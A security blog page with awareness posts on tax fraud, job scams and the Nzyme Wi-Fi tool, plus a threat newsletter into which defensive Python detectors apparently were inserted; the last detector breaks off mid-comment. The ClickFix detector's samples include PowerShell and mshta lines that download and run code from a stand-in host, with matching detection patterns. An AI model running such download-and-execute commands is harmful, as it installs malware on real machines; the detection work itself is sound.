Exploring Information Security

Securing the Future - A Journey into Cybersecurity Exploration

Tax Fraud: How to Avoid Criminals Filing Fraudulent Returns

January 30, 2025

This is a post I put together for my own internal security awareness program. Feel free to grab and use within your own organization. Created with help from ChatGPT. 

Tax season is a time when individuals and businesses focus on filing their returns and securing their refunds. However, it is also a prime opportunity for fraudsters looking to exploit the system. One particularly alarming form of fraud is when criminals file tax returns on behalf of individuals without their knowledge, stealing valuable refunds in the process. This type of fraud, known as tax-related identity theft, can have serious financial consequences for the victim. In this post, we'll dive into how this scheme works, its impact, and the steps you can take to protect yourself.

How the Scheme Operates

  1. Data Acquisition: Criminals obtain personal information through a variety of methods, such as data breaches, phishing attacks, or purchasing stolen data from underground markets. This personal information—such as your Social Security number and other identifying details—becomes their key to committing fraud.

  2. Filing False Returns: Once they have the necessary information, criminals file tax returns on behalf of individuals without their consent, typically early in the tax season to get ahead of the legitimate filer.

  3. Refund Diversion: The fraudsters request that the refund be deposited into bank accounts they control, bypassing the rightful taxpayer entirely. By the time the legitimate taxpayer files their return, the criminals have already claimed the refund.

Consequences for Victims

  • Delayed Refunds: The IRS will flag the duplicate filings, resulting in significant delays for the legitimate taxpayer's refund. This can cause frustration and financial strain, especially if the refund was anticipated to cover expenses.

  • Tax Liabilities: Victims may find themselves liable for taxes owed on fraudulent returns filed by the criminals. This unexpected liability can lead to a tax debt that wasn’t part of the original financial planning.

  • Identity Theft: Beyond the immediate tax consequences, the stolen personal information can be used in other fraudulent activities, such as opening new credit accounts or applying for loans in the victim’s name.

How to Protect Yourself

  • File Early: One of the best ways to prevent criminals from filing fraudulent returns is to file your taxes early. The sooner your return is filed, the less likely criminals are to file a fake return using your information. Early filing reduces the opportunity for fraudsters to get to your refund first.

  • Use a Reputable Tax Service: Ensure that the tax preparer you use is legitimate and has a good reputation. If you're using a tax professional, verify their credentials, such as their IRS Preparer Tax Identification Number (PTIN). Check online reviews or ask for referrals from trusted sources to avoid working with fraudulent tax preparers who might exploit your information.

  • Consider an Identity Protection PIN (IP PIN): The IRS offers an Identity Protection PIN program, which provides an added layer of security for taxpayers. This PIN is used when filing taxes and helps prevent unauthorized returns from being filed in your name.


Conclusion

Tax fraud in the form of criminals filing fraudulent returns can cause significant stress and financial loss. By understanding how the scheme works and taking proactive measures, you can better protect yourself from becoming a victim. Filing early, using a reputable tax service, monitoring your personal information, and using additional security measures like an IP PIN are all critical steps in preventing and mitigating the effects of tax-related identity theft. 

Further Reading

For more tips on protecting yourself from tax fraud, visit the IRS website and read about common scams and how to avoid them.

In Advice Tags tax fraud, security awareness

Beware of Fake Job Offers in the 2025 job market

January 17, 2025

In today's job market, the allure of remote work has become increasingly enticing. However, companies have started to shift away from remote work post-pandemic and are requiring more in-person or hybrid work from employees. Combine that with the downsizing many companies are going through right now, and job scams are going to pop up more regularly. Recently, I got the text message shown above from a “recruiter.”

While this might seem like a great opportunity, it’s a scam. A job offer does not typically come over text, nor does it happen without an interview. This is a path to handing over personal or financial information, or to being drawn into the scam ecosystem as a money mule.

The Scam: Too Good to Be True

The scam typically begins with an unsolicited message from an individual claiming to be "Emily," a customer service agent at Bonanza. The message outlines an attractive remote position with the following promises:

  • High Earnings: Potential to earn between $50 to $500 per day, with a base salary of $1,000 for every four days worked.

  • Flexible Hours: Commitment of just 60 to 90 minutes per day.

  • Comprehensive Benefits: Offers include paid annual leave, maternity and paternity leave, and other legal holidays.

  • Minimal Effort: Assurances of free training and a guaranteed paid probation period.

Recipients are encouraged to respond to a provided phone number to seize this "opportunity."

Red Flags in the Offer

While the proposition may appear appealing, several indicators suggest it's a scam:

  • Unsolicited Contact: Legitimate companies seldom extend job offers without prior interaction or application. Receiving such a message without prior engagement is suspicious.

  • Free Email Account: This text was sent from a Gmail account, which anyone can create for free.

  • Exaggerated Earnings and Benefits: Promises of substantial income for minimal work are classic red flags. Genuine employers provide realistic compensation aligned with industry standards.

  • Vague Job Description: The lack of specific details about job responsibilities, using ambiguous phrases like "helping merchants update data," is a common tactic to obscure the scam's true nature.

  • Urgency to Respond: Scammers often create a sense of urgency to prevent thorough consideration. Pressuring immediate action is a tactic to catch victims off-guard.

  • Unprofessional Communication: Errors in grammar, informal language, or inconsistencies in the message are telltale signs of fraudulent communication.

  • Request for Contact via Personal Number: Legitimate companies typically use official communication channels. Requests to contact personal numbers are uncommon and suspicious.

What Happens If You Respond?

Engaging with the scammer can lead to several detrimental outcomes:

  • Phishing for Personal Information: Scammers may request sensitive data, such as Social Security numbers or banking details, under the guise of processing employment paperwork.

  • Upfront Payments: Requests for fees covering "training" or "equipment," with promises of reimbursement, are common. Once paid, these funds are unrecoverable.

  • Identity Theft: Shared personal information can be exploited for identity theft, leading to financial and legal complications.

  • No Real Job: After extracting money or information, the scammer disappears, leaving the victim without employment and at a loss.

  • Become a Money Mule: A money mule is someone who transfers or moves illegally acquired money on behalf of others, often unknowingly.

Protecting Yourself from Job Scams

To shield yourself from such fraudulent schemes, consider the following precautions:

  • Research the Company: Visit the official website and verify job postings. Authentic opportunities are listed on company websites or reputable job boards.

  • Verify the Contact: Ensure that communications come from official company channels. Be wary of contacts using personal email addresses or phone numbers.

  • Be Skeptical of Extravagant Claims: If an offer seems too good to be true, it warrants skepticism. Legitimate jobs have clear expectations and reasonable compensation.

  • Never Pay to Work: Authentic employers do not require upfront payments for any reason.

  • Report Suspicious Offers: Report potential scams to the Federal Trade Commission (FTC) at ReportFraud.ftc.gov and to the platform where the offer was encountered.

Conclusion

Scammers continually adapt their tactics to exploit the evolving job market and technological landscape. By staying informed and vigilant, you can protect yourself from falling victim to such schemes. Always verify the legitimacy of job offers and remain cautious of unsolicited communications. Remember, if something feels amiss, it's worth investigating further. Stay safe and informed in your job search and digital interactions.

In Advice, Experiences Tags Smishing, Social Engineering, Scams

Nzyme: Your Wi-Fi Watchdog Against Wireless Woes

January 14, 2025

This was originally posted on LinkedIn by Kyle Goode. In an effort to get the blog section more populated, I’ve reached out to some authors and asked if they’d be okay having their content put on this site. Kyle was gracious enough to let me grab his posts and highlight them here. Make sure to give him a follow on LinkedIn.

Nzyme is a unique open-source Wi-Fi security solution. I have been a user since its 1.0 version, and to this day, I haven’t come across another platform that focuses as effectively on Wi-Fi security. While most access points can detect rogue access points, few offer the same level of capability as Nzyme.

Nzyme introduces the concept of "bandits," which scan and alert on common Wi-Fi penetration testing tools such as the Pwnagotchi, Wi-Fi Pineapple, and Flipper Zero ESP32. These tools are uniquely fingerprinted by the platform. Owning any of these "bandits" makes it easy and efficient to develop and test alert rules in real time.

Currently, alerts are limited to SMTP and can be categorized into two types:

  1. System-based alerts: Triggered if parts of the platform, such as taps, start failing.

  2. Security-based alerts: Triggered when a bandit is detected in the environment, malicious deauthentication packets are transmitted, or rogue access points are detected.

The Nzyme platform consists of a PostgreSQL database, the core Nzyme platform (called the Nzyme node), and a Wi-Fi dongle (called a Nzyme tap). These components are primarily run on Debian- or Ubuntu-based systems. While Raspbian is often recommended, regular Debian works just as well. Taps are Ubuntu-only but are also compatible with Debian systems.

Evolution from 1.0 to 2.0

In the 1.0 version, Nzyme was fully integrated, running as a single service. With the 2.0 alpha versions, the architecture has evolved to support a multi-node setup. You can now run a single Nzyme node and deploy as many Nzyme taps as needed for comprehensive network coverage. These components are distributed as separate packages.

One exciting feature introduced in 2.0 is trilateration, which requires at least three taps on the same floor of a building. Trilateration allows you to pinpoint the location of rogue devices, such as bandits. This is particularly useful if a threat actor gains physical access to your building and places a malicious device in an inconspicuous location, a common technique used by penetration testers. The 1.0 version even provided guidance on building a handheld tracking device for bandits, though I wasn’t brave enough to attempt it at the time.

The 2.0 version also adds support for Ethernet monitoring. By using a span/mirror/tap port on a switch, you can monitor network activity, such as DNS tunneling, beaconing, and remote connections like SSH. While I typically rely on Suricata with Snort rules and Zeek with RITA for comprehensive network monitoring, Nzyme’s Ethernet capability provides a simpler configuration and adds redundancy. Additionally, ARP analysis appears to be a planned feature in future versions.

System Monitoring and API Integration

Nzyme allows you to create monitored networks for your environment. As I’ve mentioned in a previous article, I’m a big fan of Prometheus for system monitoring and metric gathering. Nzyme offers a native exporter for Prometheus, making it easy to integrate into existing monitoring solutions.

Nzyme has also introduced Nzyme Connect, an API for obtaining GeoIP, MAC address OUI, and vendor information. Additionally, it offers Bluetooth device discovery. Although this feature is still in its early stages, I’m excited to connect it with my Ubertooth to explore its capabilities further. Nzyme Connect also serves as a SaaS platform for monitoring your Nzyme nodes and taps, with enterprise support now available. For added convenience, prebuilt Wi-Fi kits are offered, eliminating the need for manual configuration.

Future Features and Wishlist

I am eagerly anticipating the stable release of Nzyme 2.0 and the additional features that will come with it. One feature I hope to see in the future is webhook integrations with popular messaging apps like Slack and Teams. This would streamline alerting and incident response for security teams.

Nzyme continues to solidify its position as a versatile and powerful Wi-Fi security solution. Whether you're a security professional, penetration tester, or simply someone concerned about wireless security, Nzyme offers tools to protect your environment against rogue devices and malicious activities. I’m excited to see where this platform goes next.

Resources:

Nzyme

Nzyme Bandits

Nzyme Network Monitoring

Nzyme Trilateration

Nzyme Connect

Nzyme Wifi Kit

In Product, Technology Tags Nzyme, network security


January 2025 - Cybersecurity Threat Intelligence Newsletter

January 9, 2025

This is a monthly newsletter that I share internally with our Cybersecurity team. Feel free to take and use for your own team. Created with the help of ChatGPT.

ModeLeak Vulnerabilities in Google's Vertex AI Platform 

Palo Alto Networks' Unit 42 team has uncovered two critical vulnerabilities, collectively termed "ModeLeak," within Google's Vertex AI platform. These flaws could enable attackers to escalate privileges and exfiltrate sensitive machine learning (ML) models, including fine-tuned large language model (LLM) adapters. 

Key Insights: 

  • Privilege Escalation via Custom Jobs: Attackers can exploit custom job permissions to gain unauthorized access to data services within a project, leading to potential exposure of sensitive information. 

  • Model Exfiltration through Malicious Models: By deploying a poisoned model, adversaries can exfiltrate other fine-tuned models in the environment, risking proprietary data and custom optimizations. 

Google has addressed these vulnerabilities by implementing fixes in the Vertex AI platform. Organizations utilizing Vertex AI should review their security protocols to ensure protection against similar threats. 

Further Reading: Unit 42 Blog 


Black Basta Ransomware Adopts Advanced Social Engineering Tactics 

The Black Basta ransomware group has recently enhanced its attack strategies by incorporating sophisticated social engineering techniques, including email bombing, QR code phishing, and the deployment of custom malware payloads. 

Key Developments: 

  • Email Bombing: Attackers inundate targets with excessive emails by subscribing their addresses to numerous mailing lists. This tactic overwhelms victims and increases the likelihood of interaction with subsequent malicious communications. 

  • Impersonation via Microsoft Teams: Threat actors pose as IT support personnel, contacting victims through Microsoft Teams to establish trust and facilitate the installation of remote access tools. 

  • QR Code Phishing: Malicious QR codes are sent to victims, directing them to phishing sites designed to harvest credentials or deploy additional malware. 

  • Custom Malware Deployment: The group utilizes bespoke tools such as KNOTWRAP (a memory-only dropper) and KNOTROCK (a .NET-based utility) to execute ransomware payloads stealthily. 

Further Reading: The Hacker News 


North Korean IT Workers Infiltrating Global Companies 

Recent investigations have uncovered that operatives from the Democratic People's Republic of Korea (DPRK) are securing remote IT positions in international companies under false identities. These individuals channel their earnings to fund North Korea's weapons programs, posing significant security and compliance risks to employers. 

Key Insights: 

  • Use of False Identities: North Korean IT workers often utilize stolen or fabricated identities to obtain employment, making detection challenging. 

  • Revenue Generation for DPRK: Earnings from these positions are funneled back to North Korea, supporting its sanctioned weapons development initiatives. 

  • Potential for Insider Threats: Beyond financial implications, these operatives may have access to sensitive company data, increasing the risk of intellectual property theft and cyber espionage. 

Further Reading: Unit 42 Blog 


North Korean IT Workers Linked to Phishing Attacks via Malicious Video Conferencing Apps 

Unit 42 researchers have identified a cluster of North Korean IT operatives, designated as CL-STA-0237, involved in phishing attacks that deploy malware through counterfeit video conferencing applications. Operating primarily from Laos, these individuals have secured positions in various companies, leveraging their roles to further malicious activities. 

Key Insights: 

  • Malware Distribution: The group utilizes fraudulent video conferencing platforms to disseminate malware, notably the BeaverTail and InvisibleFerret remote access trojans, compromising systems during supposed job interview processes. 

  • Global Reach: By infiltrating organizations worldwide, these operatives support North Korea's illicit endeavors, including its weapons of mass destruction and ballistic missile programs. 

  • Evolving Tactics: The shift from merely seeking income to engaging in aggressive malware campaigns indicates a significant escalation in their operational strategies. 

Further Reading: Unit 42 Blog 


Surge in 'ClickFix' Social Engineering Attacks 

Cybersecurity researchers have identified a significant increase in the use of a social engineering tactic known as "ClickFix." This method deceives users into copying and pasting malicious commands into their systems, leading to malware infections. 

Key Developments: 

  • Deceptive Error Messages: Attackers present fake error dialogs, prompting users to execute provided commands to resolve non-existent issues. 

  • Malware Delivery: By following these instructions, users inadvertently run scripts that download and install malware such as Lumma Stealer and AsyncRAT. 

  • Global Impact: Campaigns employing ClickFix techniques have targeted organizations worldwide, with notable incidents involving fake GitHub security notifications and counterfeit software updates. 

Further Reading: Proofpoint Blog 


Malicious Ads Deliver SocGholish Malware to Kaiser Permanente Employees 

A recent cyberattack has targeted Kaiser Permanente employees through malicious advertisements on Google Search, leading to the distribution of SocGholish malware. 

Key Developments: 

  • Malicious Advertisements: Threat actors placed deceptive ads mimicking Kaiser Permanente's HR portal to lure employees searching for benefits and payroll information. 

  • Compromised Website Redirects: Clicking the fraudulent ad redirected users to a compromised website, bellonasoftware[.]com, which briefly displayed a phishing page before prompting a fake browser update. 

  • SocGholish Malware Deployment: The fake browser update led to the download of "Update.js," a malicious script associated with the SocGholish malware campaign, designed to collect system information and potentially allow human operators to execute further malicious actions. 

This incident highlights the evolving tactics of cybercriminals in exploiting trusted platforms like Google Ads to distribute malware. 

Further Reading: Malwarebytes Blog 


DarkGate Malware Leveraging Vishing via Microsoft Teams 

Recent analyses have identified a concerning trend in which cybercriminals are deploying DarkGate malware through vishing (voice phishing) attacks conducted via Microsoft Teams. 

Key Developments: 

  • Social Engineering Tactics: Attackers impersonate employees from known client organizations during Microsoft Teams calls, convincing victims to download remote desktop applications like AnyDesk. 

  • Malware Deployment: Once remote access is established, DarkGate malware is installed, enabling threat actors to execute malicious commands, gather system information, and maintain persistent access. 

  • Operational Impact: Although some attacks have been thwarted before data exfiltration, the initial breach underscores vulnerabilities in user awareness and the potential for significant security incidents. 

Further Reading: Trend Micro Research 


Sophisticated Phishing Campaigns Exploit Trusted Platforms 

Recent analyses have uncovered advanced phishing campaigns targeting employees across multiple industries and jurisdictions. These operations employ sophisticated techniques to bypass Secure Email Gateways (SEGs) and exploit trusted platforms, creating highly convincing schemes to deceive victims and steal their credentials. 

Key Developments: 

  • Exploitation of Trusted Platforms: Attackers leverage familiar platforms and services to enhance the credibility of their phishing attempts, making it more challenging for victims to identify fraudulent communications. 

  • Bypassing Secure Email Gateways (SEGs): The campaigns utilize advanced methods to evade detection by SEGs, allowing malicious emails to reach employees' inboxes undetected. 

  • Wide-Ranging Targets: Over 30 companies across 12 industries and 15 jurisdictions have been affected, indicating a broad and indiscriminate approach by the threat actors. 

Further Reading: Group-IB Blog 


Top Cyber Attacker Techniques (August–October 2024) 

Recent analyses have identified key cyber attacker tactics, techniques, and procedures (TTPs) observed between August 1 and October 31, 2024. 

Key Developments: 

  • Phishing Incidents: Phishing accounted for 46% of all customer incidents during this period, indicating a significant rise likely due to high employee turnover and the accessibility of phishing kits. 

  • Prevalent Malware: "SocGholish" and "LummaC2" emerged as the most frequently observed malware in customer environments, highlighting their widespread use in recent attacks. 

  • Cloud Services Alerts: There was a 20% increase in cloud services alerts, correlating with the rising adoption of cloud accounts and associated security challenges. 

  • Ransomware Activity: Despite a slowdown in "LockBit" ransomware activity due to law enforcement actions and a loss of affiliate trust, it remains a key player. Meanwhile, "RansomHub" is rising rapidly due to its attractive ransomware-as-a-service (RaaS) model. The U.S., manufacturing sector, and professional, scientific, and technical services (PSTS) sector are primary targets amidst an overall increase in ransomware attacks. 

  • Initial Access Broker (IAB) Activity: IAB activity increased by 16%, heavily targeting U.S.-based organizations, possibly due to perceived financial capabilities stemming from cyber insurance. 

  • Insider Threat Content: A 7% rise in insider threat discussions on cybercrime forums was noted, driven by significant financial incentives, underscoring the growing complexity of cybersecurity challenges. 

  • Impersonating Domain Alerts: There was a 6% increase in alerts related to impersonating domains, indicating ongoing reliance on simple techniques to capture credentials and data. 

Further Reading: ReliaQuest Blog 


Phishing Attacks Double in 2024 

Recent analyses reveal a significant surge in phishing activities throughout 2024, with overall phishing messages increasing by 202% in the latter half of the year. Notably, credential phishing attacks have escalated by 703% during the same period. 

Key Developments: 

  • Prevalence of Zero-Day URLs: Approximately 80% of malicious links identified are zero-day threats—newly created URLs designed to evade traditional detection methods. 

  • Diversification of Attack Vectors: While link-based phishing remains predominant, there is a notable increase in text-based threats, such as business email compromise (BEC) and invoice scams, as well as file-based threats employing techniques like HTML smuggling. 

  • Expansion Beyond Email: Phishing attacks are increasingly targeting multiple platforms, including SMS, LinkedIn, and Microsoft Teams, indicating a shift towards multichannel approaches. 

Further Reading: Infosecurity Magazine 


Surge in Phishing Attacks via New Top-Level Domains 

Recent analyses reveal a significant increase in phishing attacks, with a 40% rise observed in the year ending August 2024. A substantial portion of this growth is attributed to the exploitation of new generic top-level domains (gTLDs) such as .shop, .top, and .xyz, which are favored by cybercriminals due to their low registration costs and minimal verification requirements. 

Key Developments: 

  • Disproportionate Use in Cybercrime: Although new gTLDs constitute only 11% of the market for new domains, they account for approximately 37% of reported cybercrime domains between September 2023 and August 2024. 

  • Attraction to Low-Cost Registrations: Registrars offering domain registrations for less than $1, with little to no identity verification, are particularly appealing to spammers and scammers seeking to conduct malicious activities anonymously. 

  • ICANN's Expansion Plans: Despite the misuse of these new gTLDs, the Internet Corporation for Assigned Names and Numbers (ICANN) is proceeding with plans to introduce additional gTLDs, potentially broadening the landscape for cybercriminal activities. 

Further Reading: Krebs on Security 


Surge in Suspicious Domain Registrations Exploiting High-Profile Events 

Recent analyses have identified a significant increase in suspicious domain registration campaigns exploiting high-profile events, such as the 2024 Summer Olympics in Paris. 

Key Developments: 

  • Event-Driven Domain Registrations: Threat actors register deceptive domains containing event-specific keywords to mimic official websites, aiming to deceive users seeking legitimate information. 

  • Exploitation of Public Interest: Cybercriminals leverage global events to attract large audiences, using fraudulent domains to distribute malware, conduct phishing attacks, or sell counterfeit merchandise. 

  • Indicators of Malicious Activity: Monitoring domain registrations, DNS traffic, URL patterns, and textual characteristics can help identify and mitigate these threats. 

Further Reading: Unit 42 Blog 
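The two items above both come down to triaging newly registered domains: cheap gTLDs on one hand, event keywords and brand lookalikes on the other. The following is an added example, not code from the newsletter or from any of the vendors it cites; the TLD set is the newsletter's (.shop, .top, .xyz), while the event keyword list, brand watchlist and sample registrations are constructed placeholders you would replace with your own.

```python
import re

# The newsletter's examples of cheaply registered gTLDs; extend from your own abuse telemetry.
HIGH_RISK_TLDS = {"shop", "top", "xyz"}
# Constructed keyword list for one event (the 2024 Paris Olympics); rebuild it per event.
EVENT_KEYWORDS = {"olympics", "olympic", "paris2024", "tickets", "jeux"}
# Constructed brand watchlist; in practice your own domains and those of key suppliers.
BRAND_WATCHLIST = {"example-bank", "examplecorp"}

# Constructed feed of newly registered domains (none are real registrations).
NEW_REGISTRATIONS = [
    "paris2024-olympics-tickets.top",
    "examp1e-bank.shop",
    "example-bank-login.xyz",
    "my-garden-blog.net",
]


def levenshtein(a, b):
    """Edit distance; small values between a new label and a brand mean a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_domain(domain):
    """Return (score, reasons). Assumption: two-label registrable domains only,
    so a public-suffix list is needed before using this on co.uk-style names."""
    labels = domain.lower().rstrip(".").split(".")
    tld, label = labels[-1], labels[-2]
    tokens = [t for t in re.split(r"[-_.]", ".".join(labels[:-1])) if t]
    score, reasons = 0, []
    if tld in HIGH_RISK_TLDS:
        score += 2
        reasons.append(f"risky_tld:{tld}")
    hits = sorted(set(tokens) & EVENT_KEYWORDS)
    if hits:
        score += len(hits)  # one point per event keyword packed into the name
        reasons.append("event_keywords:" + ",".join(hits))
    for brand in sorted(BRAND_WATCHLIST):
        if label == brand:
            continue
        if levenshtein(label, brand) <= 2:
            score += 3  # typo-squat such as a digit 1 for a letter l
            reasons.append(f"lookalike:{brand}")
        elif brand in label:
            score += 2  # brand name padded with extra words (login, support, ...)
            reasons.append(f"brand_embedded:{brand}")
    return score, reasons


def triage(domains, threshold=3):
    """Rank domains at or above the threshold, highest score first."""
    ranked = []
    for d in domains:
        score, reasons = score_domain(d)
        if score >= threshold:
            ranked.append((d, score, reasons))
    return sorted(ranked, key=lambda r: (-r[1], r[0]))


if __name__ == "__main__":
    for domain, score, reasons in triage(NEW_REGISTRATIONS):
        print(f"{score:2d}  {domain:35s} {'; '.join(reasons)}")
```

Scores are additive on purpose: a risky TLD alone is not actionable, but a risky TLD plus event keywords or a brand lookalike is worth a blocklist entry or a takedown request.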


Zloader Malware Adopts DNS Tunneling for Stealthier C2 Communications 

Recent analyses have identified that the Zloader malware, a modular Trojan based on the leaked Zeus source code, has incorporated DNS tunneling into its command-and-control (C2) communication methods. 

Key Developments: 

  • DNS Tunneling Implementation: Zloader now employs a custom protocol over DNS, utilizing IPv4 to tunnel encrypted TLS network traffic. This technique enables the malware to conceal its C2 communications within standard DNS queries and responses, making detection more challenging. 

  • Enhanced Anti-Analysis Features: The latest version of Zloader includes improved anti-analysis capabilities, such as environment checks and API import resolution algorithms, to evade malware sandboxes and static detection methods. 

  • Interactive Shell Capability: Zloader has introduced an interactive shell that supports over a dozen commands, potentially facilitating hands-on keyboard activity by threat actors during attacks. 

Further Reading: Zscaler Blog 
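Tunnelling C2 over DNS has a footprint a resolver log can expose: one registered domain receiving many unique, long, high-entropy subdomains, because each query carries a chunk of payload. The heuristic below is an added example, not Zscaler's detection logic or anything from the newsletter; the query log is constructed, and the thresholds and the "last two labels" domain split are assumptions to tune for your environment.

```python
import math
import re
from collections import defaultdict

# Constructed sample of (client_ip, queried_name) pairs standing in for a resolver log.
# Neither the hosts nor the traffic are real; the encoded labels are arbitrary base64-like text.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "cdn.example.com"),
    ("10.0.0.5", "api.example.com"),
    ("10.0.0.9", "aGVsbG8gd29ybGQgdGhpcyBpcyBh.c2VjcmV0IGRhdGEgZ29lcyBoZXJl.tunnel-host.test"),
    ("10.0.0.9", "dGhlIHF1aWNrIGJyb3duIGZveCBq.dW1wcyBvdmVyIHRoZSBsYXp5IGRv.tunnel-host.test"),
    ("10.0.0.9", "Zm9yIHRoZSBzYWtlIG9mIHRoaXMg.ZXhhbXBsZSB3ZSBuZWVkIG1vcmUg.tunnel-host.test"),
    ("10.0.0.9", "c29tZSBtb3JlIGNvbnN0cnVjdGVk.IHBheWxvYWQgYnl0ZXMgaGVyZSEh.tunnel-host.test"),
]

# A label made only of base64/base32-style characters and at least 20 long.
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{20,}$")


def shannon_entropy(text):
    """Bits per character: ~0 for repetitive text, well above 3.5 for dense encoded data."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(name):
    """Return (subdomain_part, registered_domain). Assumption: the registrable
    domain is the last two labels; use a public-suffix list in production."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:]).lower()


def query_reasons(name):
    """Per-query indicators; an empty list means the name looks ordinary."""
    sub, _ = split_name(name)
    labels = [l for l in sub.split(".") if l]
    reasons = []
    if len(name) > 60:
        reasons.append("long_name")
    if any(len(l) >= 25 for l in labels):
        reasons.append("long_label")
    if any(ENCODED_LABEL.match(l) for l in labels):
        reasons.append("encoded_label")
    if shannon_entropy("".join(labels)) > 3.5:
        reasons.append("high_entropy")
    return reasons


def analyze(queries, min_unique_subdomains=4, min_flagged=2):
    """Aggregate per registered domain: a tunnel shows up as one domain receiving
    many distinct flag-worthy subdomains, usually from few clients."""
    per_domain = defaultdict(lambda: {"clients": set(), "subs": set(), "flagged": 0, "reasons": set()})
    for client, name in queries:
        sub, domain = split_name(name)
        rec = per_domain[domain]
        rec["clients"].add(client)
        rec["subs"].add(sub)
        reasons = query_reasons(name)
        if reasons:
            rec["flagged"] += 1
            rec["reasons"].update(reasons)
    suspicious = {}
    for domain, rec in per_domain.items():
        if rec["flagged"] >= min_flagged and len(rec["subs"]) >= min_unique_subdomains:
            suspicious[domain] = {
                "clients": sorted(rec["clients"]),
                "unique_subdomains": len(rec["subs"]),
                "reasons": sorted(rec["reasons"]),
            }
    return suspicious


if __name__ == "__main__":
    for domain, info in analyze(SAMPLE_QUERIES).items():
        print(domain, info)
```

CDN and anti-virus signature lookups also generate long, unique subdomains, so pair this with an allowlist of known domains before alerting on it.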


Cybercriminals Exploit Fake CAPTCHAs to Distribute Malware 

Recent analyses have identified a deceptive tactic where cybercriminals use fake CAPTCHA pages to distribute malware, exploiting users' trust in these verification systems. 

Key Developments: 

  • Malicious Redirects: Users visiting compromised websites are redirected to fraudulent CAPTCHA pages that closely mimic legitimate services like Google and CloudFlare. 

  • Clipboard Hijacking: These fake CAPTCHAs silently copy malicious commands to the user's clipboard via JavaScript, prompting them to execute these commands unknowingly through the Windows Run prompt. 

  • Malware Installation: Executing the copied commands leads to the installation of malware, including information stealers and remote-access trojans (RATs), which can extract sensitive data and provide persistent access to compromised systems. 

Further Reading: ReliaQuest Blog 
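Both the ClickFix item above and this fake-CAPTCHA variant end the same way: the user pastes a command into the Run prompt, so the resulting scripting host is a child of the interactive shell and its command line fetches something remote. The detector below, an added example rather than ReliaQuest's or Proofpoint's logic, runs over a constructed set of process-creation events; the field names, the .invalid hostnames and the indicator list are assumptions to adapt to your EDR's schema.

```python
import re

# Scripting hosts a pasted Run-prompt command typically lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Hosts that should almost never be handed a URL by an interactive user.
LOLBIN_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Parents indicating the user typed or pasted the command (Win+R and File Explorer
# both launch via explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line fragments that together read as "fetch something remote and run it".
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web_download": re.compile(r"\biwr\b|invoke-webrequest|downloadstring|\bcurl\b", re.I),
    "policy_bypass": re.compile(r"-ep\s+bypass|executionpolicy\s+bypass", re.I),
}

# Constructed process-creation events (not real telemetry); the .invalid TLD never resolves.
SAMPLE_EVENTS = [
    {"pid": 4101, "parent_image": "explorer.exe", "image": "notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"pid": 4188, "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe"},  # user simply opened a shell
    {"pid": 4310, "parent_image": "svchost.exe", "image": "powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\mgmt\inventory.ps1"},
    {"pid": 4452, "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://captcha.example.invalid/verify.txt | iex"'},
    {"pid": 4460, "parent_image": "explorer.exe", "image": "mshta.exe",
     "command_line": "mshta https://captcha.example.invalid/verify.hta"},
]


def classify(event):
    """Return the indicator names present in one event's command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["command_line"])]
    if event["image"].lower() in LOLBIN_HOSTS and "remote_url" in hits:
        hits.append("lolbin_remote")  # mshta/wscript given a URL is its own red flag
    return hits


def detect(events, min_hits=2):
    """Flag interactive-shell children that are scripting hosts with enough indicators.
    A scheduled-task or management-agent parent (svchost.exe etc.) is left to other rules."""
    findings = []
    for ev in events:
        if ev["parent_image"].lower() not in INTERACTIVE_PARENTS:
            continue
        if ev["image"].lower() not in SCRIPT_HOSTS:
            continue
        hits = classify(ev)
        if len(hits) >= min_hits:
            findings.append({"pid": ev["pid"], "image": ev["image"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['image']}: {', '.join(f['hits'])}")
```

Pairing the process event with a clipboard-paste or Run-dialog telemetry source, where your EDR exposes one, cuts the false positives from administrators who legitimately paste download one-liners.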


Threat Actors Exploit LDAP for Network Enumeration 

Recent analyses have identified that both nation-state and cybercriminal threat actors are leveraging the Lightweight Directory Access Protocol (LDAP) to perform network enumeration within Active Directory environments. 

Key Developments: 

  • Abuse of LDAP Attributes: Attackers utilize LDAP queries to extract sensitive information, such as user accounts, group memberships, and permissions, facilitating lateral movement and privilege escalation within compromised networks. 

  • Use of Enumeration Tools: Tools like BloodHound and its data collector, SharpHound, are commonly employed to map Active Directory structures, identifying potential attack paths and high-value targets. 

  • Detection Challenges: Distinguishing between legitimate and malicious LDAP activity is difficult due to the high volume of benign LDAP traffic in typical network environments, complicating efforts to detect and mitigate these attacks. 

Further Reading: Unit 42 Blog 
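The detection challenge the item describes is one of volume and shape rather than of any single query: one account reading its own object is normal, while one workstation issuing class-wide subtree searches for every attribute across the whole directory is what a collector does. The profiler below is an added example, not Unit 42's detection logic; the LDAP search log, the allowlist of expected enumerators and the filter list are constructed assumptions.

```python
from collections import defaultdict

# Filters that return whole object classes rather than one named object. Collectors
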